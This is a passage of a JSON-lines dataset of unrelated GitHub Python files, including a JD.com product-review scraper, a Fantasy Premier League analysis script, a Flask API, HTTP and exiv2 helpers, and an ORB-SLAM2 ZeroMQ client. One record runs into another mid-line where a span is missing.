self._delete_one(uid)\n","repo_name":"ashapochka/chainvoice","sub_path":"app/api/order_item_api.py","file_name":"order_item_api.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"21312596308","text":"from bs4 import BeautifulSoup as bs\r\nfrom selenium import webdriver \r\nfrom selenium.common.exceptions import TimeoutException\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.phantomjs.webdriver import WebDriver\r\nimport json\r\nfrom time import sleep\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver import ActionChains\r\nfrom random import randint\r\nfrom multiprocessing import Semaphore,Process\r\nimport re\r\nimport os\r\n\r\ndef get_cookie():\r\n\toptions=webdriver.ChromeOptions()\r\n\tprefs = {\"profile.managed_default_content_settings.images\": 2,'profile.default_content_setting_values' : { 'notifications' : 2 }}\r\n\toptions.add_experimental_option(\"prefs\", prefs)\r\n\tuser_ag='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'\r\n\toptions.add_argument('--user-agent=%s'%user_ag)\r\n\toptions.add_argument('--disable-infobars')\r\n\toptions.add_argument('--disable-gpu') \r\n\toptions.add_argument('--incognito')\r\n\t#options.add_argument('--headless')\r\n\tdriver = webdriver.Chrome(chrome_options=options)\r\n\tdriver.get('https://passport.jd.com/new/login.aspx?ReturnUrl=https%3A%2F%2Fwww.jd.com%2F')\r\n\ttry:\r\n\t\tresult=WebDriverWait(driver,100).until(EC.title_is('京东(JD.COM)-正品低价、品质保障、配送及时、轻松购物!'))\r\n\texcept:\r\n\t\tprint(\"no!!\")\r\n\r\n\tcookies=driver.get_cookies()\r\n\tcookies=json.dumps(cookies)\r\n\twith open(\"cookies.json\",\"w\") as fbb:\r\n\t\t\tjson.dump(cookies,fbb)\r\n\r\nsem_all_html=Semaphore(1)\r\nsem_end=Semaphore(0)\r\nsem_url=Semaphore(0)\r\nsem_cook=Semaphore(1)\r\nclass acq_url(Process):\r\n\tdef __init__(self):\r\n\t\tsuper(acq_html,self).__init__()\r\n\tdef run(self):\r\n\t\toptions=webdriver.ChromeOptions()\r\n\t\tprefs = {\"profile.managed_default_content_settings.images\": 2,'profile.default_content_setting_values' : { 'notifications' : 2 }}\r\n\t\toptions.add_experimental_option(\"prefs\", prefs)\r\n\t\tuser_ag='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'\r\n\t\toptions.add_argument('--user-agent=%s'%user_ag)\r\n\t\toptions.add_argument('--disable-infobars')\r\n\t\toptions.add_argument('--disable-gpu') \r\n\t\toptions.add_argument('--incognito')\r\n\t\t#options.add_argument('--headless')\r\n\t\tpage_num=10\r\n\t\tdriver = webdriver.Chrome(chrome_options=options)\r\n\t\tsem_cook.acquire()\r\n\t\twith open(\"cookies.json\",\"r\") as f:\r\n\t\t\tcookies=json.loads(json.load(f))\r\n\t\tsem_cook.release()\r\n\t\tdriver.get(\"https://www.jd.com\")\r\n\t\tdriver.delete_all_cookies()\r\n\t\tfor cookie in cookies:\r\n\t\t\tdriver.add_cookie(cookie)\r\n\t\tsleep(0.5)\r\n\t\tdriver.find_element_by_xpath('//*[@id=\"key\"]').send_keys('蓝牙键盘')\r\n\t\tsleep(2)\r\n\t\tdriver.find_element_by_xpath('//*[@id=\"search\"]/div/div[2]/button').click()\r\n\t\tac=ActionChains(driver)\r\n\t\tfor i1 in range(page_num):\r\n\t\t\tfor i in range(4):\r\n\t\t\t\tsleep(randint(0,3))\r\n\t\t\t\tac.send_keys(Keys.PAGE_DOWN).perform()\r\n\t\t\t\tprint(i)\r\n\t\r\n\t\t\tsleep(randint(3,5))\r\n\r\n\t\t\twith 
open(\"page_\"+str(i1)+'.html','wb') as f:\r\n\t\t\t\tf.write(driver.page_source.encode(\"utf-8\",\"ignore\"))\r\n\t\t\tsem_url.release()\r\n\t\t\tprint(\"写入成功\",i1)\r\n\t\t\tsleep(randint(5,8))\r\n\t\t\tac.send_keys(Keys.RIGHT).perform()\r\n\r\nclass acq_html(Process):\r\n\tdef __init__(self):\r\n\t\tsuper(acq_data,self).__init__()\r\n\t\r\n\tdef run(self):\r\n\t\toptions=webdriver.ChromeOptions()\r\n\t\tprefs = {\"profile.managed_default_content_settings.images\": 2,'profile.default_content_setting_values' : { 'notifications' : 2 }}\r\n\t\toptions.add_experimental_option(\"prefs\", prefs)\r\n\t\tuser_ag='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'\r\n\t\toptions.add_argument('--user-agent=%s'%user_ag)\r\n\t\toptions.add_argument('--disable-infobars')\r\n\t\toptions.add_argument('--disable-gpu') \r\n\t\toptions.add_argument('--incognito')\r\n\t\t#options.add_argument('--headless')\r\n\t\tdriver = webdriver.Chrome(chrome_options=options)\r\n\t\tsem_cook.acquire()\r\n\t\twith open(\"cookies.json\",\"r\") as f:\r\n\t\t\tcookies=json.loads(json.load(f))\r\n\t\tsem_cook.release()\r\n\t\tdriver.get(\"https://www.jd.com\")\r\n\t\tdriver.delete_all_cookies()\r\n\t\tfor cookie in cookies:\r\n\t\t\tdriver.add_cookie(cookie)\r\n\t\tac=ActionChains(driver)\r\n\t\tfor i in range(10):\r\n\t\t\tsem_url.acquire()\r\n\t\t\twith open(\"page_\"+str(i)+\".html\",'rb') as f:\r\n\t\t\t\ttext=bs(f.read(),'html.parser')\r\n\t\t\tlianjie=[]\r\n\t\t\tfor link in text.find_all('strong'):\r\n\t\t\t\tfor lin in link.find_all('a'):\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tlianjie.append(\"https:\"+lin.get(\"href\"))\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tprint(\"null\")\r\n\t\t\tfor ind,t in enumerate(lianjie):\r\n\t\t\t\tprint(t)\r\n\t\t\t\tdriver.get(t)\r\n\t\t\t\tpage_all=-1\r\n\t\t\t\tfor index in range(2,7):\r\n\t\t\t\t\tsleep(randint(0,2))\r\n\t\t\t\t\tfor n in range (randint(2,4)):\r\n\t\t\t\t\t\tac.send_keys(Keys.PAGE_DOWN).perform()\r\n\t\t\t\t\t\tsleep(randint(0,3))\r\n\t\t\t\t\t#if page_all==-1:\r\n\t\t\t\t\t\t#cc=driver.find_element_by_xpath('/html/body/div[10]/div[2]/div[3]/div[2]/div[2]/div[1]/ul/li[1]/a/em').text\r\n\t\t\t\t\t\t#cc=driver.find_elements_by_css_selector(\"[data-anchor='#comment']\")\r\n\t\t\t\t\t\t#cc=driver.find_elements_by_link_text('商品评价')\r\n\t\t\t\t\t\t#all_num=cc.text\r\n\t\t\t\t\tsem_all_html.acquire()\r\n\t\t\t\t\twith open(\"all.html\",'ab') as f:\r\n\t\t\t\t\t\tf.write(driver.page_source.encode(\"utf-8\",\"ignore\"))\r\n\t\t\t\t\tsem_all_html.release()\r\n\t\t\t\t\tif sem_end.get_value()<0:\r\n\t\t\t\t\t\tsem_end.release()\r\n\t\t\t\t\tprint(\"save!!\")\r\n\t\t\t\t\tsleep(randint(5,8))\r\n\t\t\t\t\tflag=-1\r\n\t\t\t\t\tfor indx,ele in enumerate(driver.find_elements_by_link_text(str(index))):\r\n\t\t\t\t\r\n\t\t\t\t\t\ttx = ele.get_attribute(\"rel\")\r\n\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tif tx==str(index):\r\n\t\t\t\t\t\t\t\tprint(\"ins\")\r\n\t\t\t\t\t\t\t\tflag=1\r\n\t\t\t\t\t\t\t\tele.click()\r\n\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\tprint(\"ee\",indx)\r\n\t\t\t\t\r\n\t\t\t\t\tif flag==-1:\r\n\t\t\t\t\t\tbreak\r\n\t\tsem_end.release()\r\n\t\tsem_end.release()\r\n\t\tsem_end.release()\r\nclass acq_data(Process):\r\n\tdef __init__(self):\r\n\t\tsuper(acq_data,self).__init__()\r\n\t\r\n\tdef run(self):\r\n\t\tcommit=[]\r\n\t\twhile sem_end.get_value()==0:\r\n\t\t\tif os.path.exists(\"all.html\"):\r\n\t\t\t\tprint(\"存在\")\r\n\t\t\t\tsem_all_html.acquire()\r\n\t\t\t\twith open(\"all.html\",'rb') as 
f:\r\n\t\t\t\t\tgg=f.read().split(b' 90)\n ]\n .copy()\n .sort_values([\"gkCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"gkCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n top_def = (\n player_core.loc[\n (player_core[\"singular_name_short\"] == \"DEF\")\n & (player_core[\"minutes\"] > 90)\n ]\n .copy()\n .sort_values([\"defCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"defCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n top_mid = (\n player_core.loc[\n (player_core[\"singular_name_short\"] == \"MID\")\n & (player_core[\"minutes\"] > 90)\n ]\n .copy()\n .sort_values([\"midCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"midCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n top_fwd = (\n player_core.loc[\n (player_core[\"singular_name_short\"] == \"FWD\")\n & (player_core[\"minutes\"] > 90)\n ]\n .copy()\n .sort_values([\"fwdCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"fwdCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n pass\n\n\nif __name__ == \"__main__\":\n imported_data = importData()\n out = preProc(imported_data)\n","repo_name":"desiretheory/fpl","sub_path":"fpl/fpl/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":9455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29589209738","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport time\r\nfrom datetime import datetime\r\n\r\n#set default variable\r\ncurrent_top1 = \"Blank\"\r\ni = 0\r\n\r\n# create infinite loop to keep program running\r\nwhile True:\r\n # use BeautifulSoup to get BBC web page and access top story #1 headline\r\n page = requests.get(\"https://www.bbc.co.uk/news\")\r\n soup = BeautifulSoup(page.content, 'html.parser')\r\n top1_div = soup.find(\"div\", attrs={\"data-entityid\": \"container-top-stories#1\"})\r\n top1_head = top1_div.h3.string\r\n\r\n # used to add timestamp to any change to top story\r\n now = datetime.now()\r\n current_time = now.strftime(\"%d/%m/%Y, %H:%M:%S\")\r\n\r\n # check if top story headline has changed and print relevant result\r\n if(top1_head != current_top1):\r\n print(\"New Top Story!!! 
(\", current_time, \")\")\r\n        print(top1_head)\r\n        current_top1 = top1_head\r\n        i=0\r\n    else:\r\n        if(i % 10 == 0):\r\n            print(\"No change to top story, current top story is:\")\r\n            print(top1_head)\r\n        else:\r\n            print(\"...\")\r\n        i+=1\r\n    # to add delay to loop re-running\r\n    time.sleep(10.0)\r\n","repo_name":"EuanDodds/Portfolio-Projects","sub_path":"bbc_top_story.py","file_name":"bbc_top_story.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"74895826010","text":"class Solution:\n    def removeDuplicates(self, s: str, k: int) -> str:\n        stack = []  # [[\"a\", 3], [\"b\", 5], ...]\n        for i, ch in enumerate(s):\n            if stack and stack[-1][0] == ch:\n                stack[-1][1] += 1\n                if stack[-1][1] == k:\n                    stack.pop()\n            else:\n                stack.append([ch, 1])\n\n        return ''.join(c * cnt for c, cnt in stack)\n","repo_name":"debbs061/algorithm","sub_path":"src/1209-remove-all-adjacent-duplicates-in-string-2.py","file_name":"1209-remove-all-adjacent-duplicates-in-string-2.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12601230276","text":"from flask import Blueprint, jsonify, request\nfrom flask_login import login_required, current_user\nfrom app.models.category import db, Category\nfrom ..forms.category_form import CategoryForm\nfrom .auth_routes import validation_errors_to_error_messages\n\ncategory_routes = Blueprint('categories', __name__)\n\n\n# CREATE A NEW CATEGORY\n@category_routes.route('/new', methods=['POST'])\n@login_required\ndef create_category():\n    form = CategoryForm()\n    form['csrf_token'].data = request.cookies['csrf_token']\n\n    if form.validate_on_submit():\n        category = Category(\n            name=form.data['name'],\n            user_id=current_user.id\n        )\n        db.session.add(category)\n        db.session.commit()\n\n        return category.to_dict(), 200\n    else:\n        return {'errors': validation_errors_to_error_messages(form.errors)}, 401\n\n\n# READ ALL CATEGORIES\n@category_routes.route('/')\n@login_required\ndef user_categories():\n    user_categories = Category.query.filter_by(user_id=current_user.id).all()\n    return {'categories': [category.to_dict() for category in user_categories]}, 200\n\n\n# GET CATEGORY INFO BASED ON CATEGORY ID (GRABS ALL ITEMS IN CATEGORY)\n@category_routes.route('/<int:category_id>')\n@login_required\ndef one_category(category_id):\n    user_category = Category.query.get(category_id)\n    if user_category:\n        if user_category.user_id == current_user.id:\n            return {'category': user_category.to_dict()}, 200\n        else:\n            return {'errors': 'Unauthorized to get this category'}, 401\n    else:\n        return {'errors': 'Category not found'}, 404\n\n\n# UPDATE A CATEGORY NAME BASED ON CATEGORY ID\n@category_routes.route('/<int:category_id>', methods=[\"PUT\", \"PATCH\"])\n@login_required\ndef update_category(category_id):\n    form = CategoryForm()\n    form['csrf_token'].data = request.cookies['csrf_token']\n\n    if form.validate_on_submit():\n        category = Category.query.get(category_id)\n\n        if category:\n            if category.user_id == current_user.id:\n                category.name = form.data['name']\n                db.session.commit()\n                return category.to_dict(), 200\n            else:\n                return {'errors': 'Unauthorized to update this category'}, 401\n        else:\n            return {'errors': 'Category not found'}, 404\n    else:\n        return {'errors': validation_errors_to_error_messages(form.errors)}, 400\n\n\n# DELETE A CATEGORY FROM CATEGORY ID\n@category_routes.route('/<int:category_id>', methods=[\"DELETE\"])\n@login_required\ndef delete_category(category_id):\n    category = Category.query.get(category_id)\n    if category:\n        if category.user_id == current_user.id:\n            db.session.delete(category)\n            db.session.commit()\n            return {'message': 'Category deleted successfully'}, 200\n        else:\n            return {'errors': 'Unauthorized to delete this category'}, 401\n    else:\n        return {'errors': 'Category not found'}, 404\n","repo_name":"yassin30000/inventory_now","sub_path":"app/api/category_routes.py","file_name":"category_routes.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20286369385","text":"\"\"\"\nNetworking helpers\n\"\"\"\n\nimport os\n\nimport requests\n\n\ndef get(url, params=None, headers=None, cookies=None, encoding='utf-8', result_type='text', need_print=True):\n    \"\"\"\n    Fetch data\n    :param url: URL\n    :param params: parameters\n    :param headers: headers\n    :param cookies: cookies\n    :param encoding: encoding\n    :param result_type: result type\n    :param need_print: whether to print\n    :return:\n    \"\"\"\n    # Spoofed User-Agent header\n    # Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\n    ua = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'\n    if headers is None or not isinstance(headers, dict):\n        headers = {\n            'User-Agent': ua\n        }\n    else:\n        if not 'User-Agent' in headers.keys():\n            headers['User-Agent'] = ua\n    # Open the request\n    if need_print:\n        print(\"open \" + url)\n        if params is not None:\n            print('params', params)\n    result = requests.get(url, params=params, headers=headers, cookies=cookies)\n    result.encoding = encoding\n    if result_type == 'text':\n        result = result.text\n    elif result_type == 'json':\n        result = result.json()\n    if need_print:\n        print(f'result is {result_type}\\n{result}')\n    return result\n\n\ndef get_file(url, file_path, need_print=True, **kwargs):\n    \"\"\"Download a file\"\"\"\n    if need_print:\n        print('Downloading file %s from %s' % (file_path, url))\n    dir_name = os.path.dirname(file_path)\n    if not os.path.exists(dir_name):\n        os.makedirs(dir_name)\n        if need_print:\n            print('Created directory %s' % dir_name)\n    r = requests.get(url, None, **kwargs)\n    with open(file_path, 'wb') as f:\n        f.write(r.content)\n    if need_print:\n        print('Download finished')\n\n\ndef parse_cookies_from_file(file_path, exit_if_not_exists=True):\n    \"\"\"\n    Parse cookies from a file\n    :param file_path: file path\n    :param exit_if_not_exists: whether to exit if the file does not exist\n    :return:\n    \"\"\"\n    if not os.path.exists(file_path):\n        print('cookies file not exists:', file_path)\n        if exit_if_not_exists:\n            exit()\n        else:\n            return\n    with open(file_path, encoding='utf-8') as f:\n        return parse_cookies(f.read())\n\n\ndef parse_cookies(cookies=''):\n    \"\"\"Parse cookies out of a string\"\"\"\n    result = dict()\n    if not cookies:\n        return result\n\n    key_value_list = cookies.split(';')\n    for key_value in key_value_list:\n        key_value_pair = key_value.split('=', maxsplit=1)\n        if len(key_value_pair) == 2:\n            key, value = key_value_pair\n            result[key.strip()] = value.strip()\n    return result\n\n\ndef parse_params_from_file(file_path):\n    with open(file_path, encoding='utf-8') as f:\n        return parse_params(f.read())\n\n\ndef cookies_to_str(cookies):\n    \"\"\"Convert cookies to a string\"\"\"\n    return ';'.join([k + '=' + v for k, v in cookies.items()])\n\n\ndef parse_params(params):\n    \"\"\"\n    Parse parameters copied directly from a Fiddler capture\n    Lines starting with # and blank lines are ignored\n    \"\"\"\n    data = {}\n    for line in params.split('\\n'):\n        if line.startswith('#'):\n            continue\n        if '\\t' not in line:\n            continue\n        key, value = line.split('\\t')\n        data[key] = value\n    return data\n\n\ndef handle_result(request, success_callback=None, fail_callback=None, print_result=True):\n    \"\"\"Handle the result\"\"\"\n    result = request.json()\n    if print_result:\n        print(result)\n    if result:\n        code = result['code']\n        if code == 200:\n            # success\n            data = result['data']\n            if success_callback:\n                success_callback(data)\n            return data\n        else:\n            # failure\n            msg = result['msg']\n            print(msg)\n            if fail_callback:\n                fail_callback(code, msg)\n    else:\n        # result is empty\n        if fail_callback:\n            fail_callback(0, None)\n    return None\n","repo_name":"pingfangx/pythonx","sub_path":"ToolsX/xx/netx.py","file_name":"netx.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"32"}
+{"seq_id":"1510032279","text":"# -*- coding: utf-8 -*-\nfrom subprocess import CalledProcessError\nfrom typing import List\n\nfrom lib import cli\nimport lib.meta_data as md\nfrom lib.config import Configuration\nfrom tests.defines import EXIV2_WARN_ERROR_CODE\n\n\nclass ExifEditor:\n\n    def __init__(self, config: Configuration):\n        self._config = config\n\n    def get_meta_data_safe(self, path: str) -> md.MetaData:\n        \"\"\"\n        :raises InvalidMetaDataError if the exiv data of the file could not be parsed\n        FileNotFoundError if the file could not be found\n        \"\"\"\n        try:\n            return self.get_meta_data(path)\n        except CalledProcessError:\n            return md.empty()\n\n    def get_meta_data(self, path: str) -> md.MetaData:\n        \"\"\"\n        :raises CalledProcessError if the exiv2 command terminated abnormally\n        InvalidMetaDataError if the exiv data of the file could not be parsed\n        FileNotFoundError if the file could not be found\n        \"\"\"\n        try:\n            serialized = self._read_exif_field(self._config.exif_field_name, path)\n        except CalledProcessError as e:\n            if _is_file_not_found(e):\n                raise FileNotFoundError(e)\n            else:\n                raise e\n        return md.deserialize(serialized)\n\n    def set_meta_data(self, path: str, data: md.MetaData):\n        \"\"\"\n        :raises CalledProcessError if the exiv2 command terminated abnormally\n        FileNotFoundError if the file could not be found\n        \"\"\"\n        try:\n            self._write_exif_field(self._config.exif_field_name, data.serialize(), path)\n        except CalledProcessError as e:\n            if _is_file_not_found(e):\n                raise FileNotFoundError(e)\n            else:\n                raise e\n\n    def _read_exif_field(self, field_name: str, path: str) -> str:\n        base = self._build_exiv_base_command()\n        command = self._build_exiv_read_command(base, field_name, path)\n        std_out_lines = cli.run_cmd(command, EXIV2_WARN_ERROR_CODE)\n        return \" \".join(std_out_lines[0].split()[3:])\n\n    def _write_exif_field(self, field_name: str, value: str, path: str):\n        base = self._build_exiv_base_command()\n        command = self._build_exiv_write_command(base, field_name, value, path)\n        cli.run_cmd(command)\n\n    def _build_exiv_base_command(self) -> List[str]:\n        cmd = ['exiv2', '-n', self._config.exiv2_charset]\n        if self._config.exiv2_quiet:\n            cmd.append('-q')\n        return cmd\n\n    def _build_exiv_read_command(self, base_command: List[str], field_name: str, path: str):\n        base_command.append('-b')\n        base_command.append('-K')\n        base_command.append(field_name)\n        base_command.append(path)\n        return base_command\n\n    def _build_exiv_write_command(self, base_command: List[str], field_name: str, value: str, path: str):\n        if self._config.exiv2_keep_time_stamps:\n            base_command.append('-k')\n        base_command.append('-M')\n        base_command.append('set ' + field_name + ' ' + value)\n        base_command.append(path)\n        return base_command\n\n\ndef _is_file_not_found(error: CalledProcessError):\n    return error.returncode == 
255\n","repo_name":"enguerrand/tie","sub_path":"lib/exif_editor.py","file_name":"exif_editor.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33978138416","text":"import logging, glob, re, click\nfrom sqlalchemy import create_engine, Column, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import distinct\nfrom openpyxl import load_workbook\nfrom xlrd import *\n\n\n# configure sqlalchemy\nColumn = Column\nInteger = Integer\nString = String\nBase = declarative_base()\ncreate_engine = create_engine\nengine = create_engine('sqlite:///:memory:', echo=True)\nSession = sessionmaker(bind=engine)\n\n\nclass UserEmail(Base):\n __tablename__ = 'emails'\n\n id = Column(Integer, primary_key=True)\n user_id = Column(String(128))\n email = Column(String(320))\n\n\nBase.metadata.create_all(engine)\n\n\n# configure logging\nlogging.basicConfig(level=logging.DEBUG)\n\n\ndef find_all_reports(dir):\n # 'AllReviewsReport', 'AllReviewsbyContributorReport'\n return glob.glob('{0}/*{1}*.xls'.format(dir, 'AllReviewsReport'))\n\n\ndef get_emails(reports):\n \"\"\"Get all reports, collect all 'User ID' and 'User Email Address'\n values\"\"\"\n logging.debug(reports)\n for r in reports:\n wb = open_workbook(r)\n if 'All Reviews Report' in wb.sheet_names():\n ws = wb.sheet_by_name('All Reviews Report')\n logging.debug('cols: {0}, rows: {1}'.format(ws.ncols, ws.nrows))\n logging.debug(ws.name)\n logging.debug(ws.row(3))\n logging.debug(ws.row(3)[0].value)\n\n email_loc = [{'row': row, 'col': col}\n for col in range(ws.ncols)\n for row in range(ws.nrows)\n if ws.cell_value(row, col) == 'User Email Address']\n\n if len(email_loc) > 1:\n raise ValueError('More than one column in the All Reviews\\\n Report \"{0}\" was named \"{1}\"'.format(\n r,\n 'User Email Address'))\n\n userid_loc = [{'row': row, 'col': col}\n for col in range(ws.ncols)\n for row in range(ws.nrows)\n if ws.cell_value(row, col) == 'User ID']\n\n if len(userid_loc) > 1:\n raise ValueError('More than one column in the All Reviews\\\n Report \"{0}\" was named \"{1}\"'.format(\n r,\n 'User ID'))\n\n emails = [UserEmail(\n user_id=ws.cell_value(row, userid_loc[0]['col']),\n email=ws.cell_value(row, email_loc[0]['col']))\n for row in range(email_loc[0]['row'] + 1, ws.nrows)]\n\n logging.debug(emails)\n logging.debug(dir(emails[0]))\n\n session = Session()\n\n session.add_all(emails)\n session.commit()\n\n logging.debug(session.query(UserEmail).distinct(UserEmail.email).group_by(UserEmail.email).count())\n\n\n\ndef dedupe_emails():\n pass\n\n\ndef merge_emails():\n pass\n\n\n@click.command()\n@click.argument('dir', type=click.Path(exists=True,\n writable=True))\ndef cli(dir=\".\"):\n \"\"\"\"Simple progam that takes Bazaarvoice All Reviews Report, pulls in all\n 'User ID' and 'User Email Address' data, de-dupes it and merges it into\n the All Reviews by Contributor report, merging on\n 'User ID' and 'Reviewr ID'.\"\"\"\n logging.debug(dir)\n reports = find_all_reports(dir)\n get_emails(reports)\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"arteedecco/all-reviews-reports-merge","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36949143983","text":"#!/usr/bin/env python3\n\nfrom datetime import datetime, date, 
timedelta\nfrom utils import log_msg\nfrom bwdb import DB\nimport argparse\nimport os\nimport sys\n\n\ndef init_globals(args):\n global app_root, db\n app_path = os.path.dirname(os.path.realpath(__file__))\n app_root = os.path.realpath(os.path.join(app_path, '..'))\n\n db = DB(db=args.database)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Sniff interface to record metrics of IP packets.')\n\n #parser.add_argument('-c', '--config', type=str,\n # default='bwm.cfg',\n # help='configuration file')\n parser.add_argument('-d', '--database', type=str,\n default='net_mon.db',\n help='database')\n parser.add_argument('-M', '--minute_table', type=int,\n default=8,\n help='weeks to keep minute table')\n parser.add_argument('-H', '--hour_table', type=int,\n default=26,\n help='weeks to keep hour table')\n parser.add_argument('-D', '--day_table', type=int,\n default=520,\n help='weeks to keep day table')\n\n return parser.parse_args()\n\n\ndef create_tables():\n global db\n log_msg('creating tables')\n db.create_tables()\n\n\ndef rebuild_table(name=''):\n global db\n log_msg('rebuilding table: name='+str(name))\n day = db.get_min_full_day()\n db.summarize_data(name, day, compare='>=')\n log_msg('rebuilding done')\n\n\ndef archive_table(name='', weeks=''):\n global db\n day = (date.today() - timedelta(weeks=weeks)).strftime('%Y-%m-%d')\n log_msg('archiving table: name='+str(name)+', weeks='+str(weeks)+', day='+str(day))\n log_msg('archiving done')\n\n\nif __name__ == \"__main__\":\n global db\n\n log_msg('Initializing '+__file__+'...')\n\n args = parse_args()\n\n init_globals(args)\n\n rebuild_table('hour')\n rebuild_table('day')\n #archive_table('minute', args.minute_table)\n #archive_table('hour', args.hour_table)\n #archive_table('day', args.day_table)\n\n log_msg('Done.')\n\n","repo_name":"streckc/bwm","sub_path":"bin/db_maint.py","file_name":"db_maint.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"32141788491","text":"import utility\nimport resolution_equation as resolve\nimport variable_equation as veq\ndef base_function():\n user_input = utility.get_equation()\n user_input = user_input.replace(\" \", \"\")\n mode = utility.chose_mode(user_input)\n if not mode:\n result = resolve.create_result(user_input)\n else:\n result = veq.resolve_variable_equation(user_input)\n\n if result == 'Errore':\n print('Errore')\n base_function()\n else:\n print(result)\n response = input(\"Do you want to continue? 
Y/N \")\n control = utility.control_response(response)\n if control:\n base_function()\n else:\n print('GoodBye')","repo_name":"GvMazzon25/FirstPythonProject","sub_path":"sub_main.py","file_name":"sub_main.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7483085639","text":"import zmq\nimport cv2\nimport numpy as np\nimport time\nimport imageio\n\n\nclass OrbSlam2Connector:\n # slam server 地址\n slam_server_address = '127.0.0.1:35696'\n # 掉线标记\n offline = True\n # 连接时最大尝试次数\n max_try_count = 10\n\n\n _SLAM_SYSTEM_NOT_READY = -1,\n _SLAM_NO_IMAGES_YET = 0,\n _SLAM_NOT_INITIALIZED = 1,\n _SLAM_OK = 2,\n _SLAM_LOST = 3\n\n def __init__(self):\n self.start_time = time.time()\n print('orbslam2_connector: init slam connect')\n self.ctx = zmq.Context()\n self.socket = self.ctx.socket(zmq.REQ)\n self.socket.setsockopt(zmq.LINGER, 0)\n self.socket.setsockopt(zmq.RCVTIMEO, 1000)\n self.socket.setsockopt(zmq.SNDTIMEO, 1000)\n # 要求如果没有建立链接,立刻返回\n self.socket.setsockopt(zmq.IMMEDIATE, True)\n # 要求应答序号要一一对应\n self.socket.setsockopt(zmq.REQ_CORRELATE, True)\n # 要求不严格轮换\n self.socket.setsockopt(zmq.REQ_RELAXED, True)\n\n self.socket.connect('tcp://%s' % self.slam_server_address)\n while self.offline:\n try:\n print('orbslam2_connector: try say hello to slam server')\n self.socket.send(bytes(np.array([-1], np.int32)))\n data = self.socket.recv()\n if len(data) == 4:\n data = int(np.frombuffer(data, np.int))\n if data == -1:\n print('orbslam2_connector: connect success')\n self.offline = False\n continue\n print('wrong data')\n except zmq.error.Again:\n print('orbslam2_connector: connect out of time, will try again')\n\n\n def get_pos(self, imgLR):\n imgLR = cv2.resize(imgLR, (1280, 360), interpolation=cv2.INTER_AREA)\n assert imgLR.shape == (360, 1280, 3)\n\n ts = time.time() - self.start_time\n ts = int(ts*1000)\n mtype = bytes(np.array([1], np.int32))\n timestamp = bytes(np.array([ts], np.int32))\n imcode = bytes(cv2.imencode('.jpg', imgLR)[1])\n imcode_len = bytes(np.array([len(imcode)], np.uint32))\n msg = mtype + timestamp + imcode_len + imcode\n\n try:\n self.socket.send(msg, copy=False)\n self.offline = False\n except zmq.error.Again:\n self.offline = True\n\n # 如果没有成功发送\n if self.offline:\n print('orbslam2_connector: found offline when send data')\n return False, 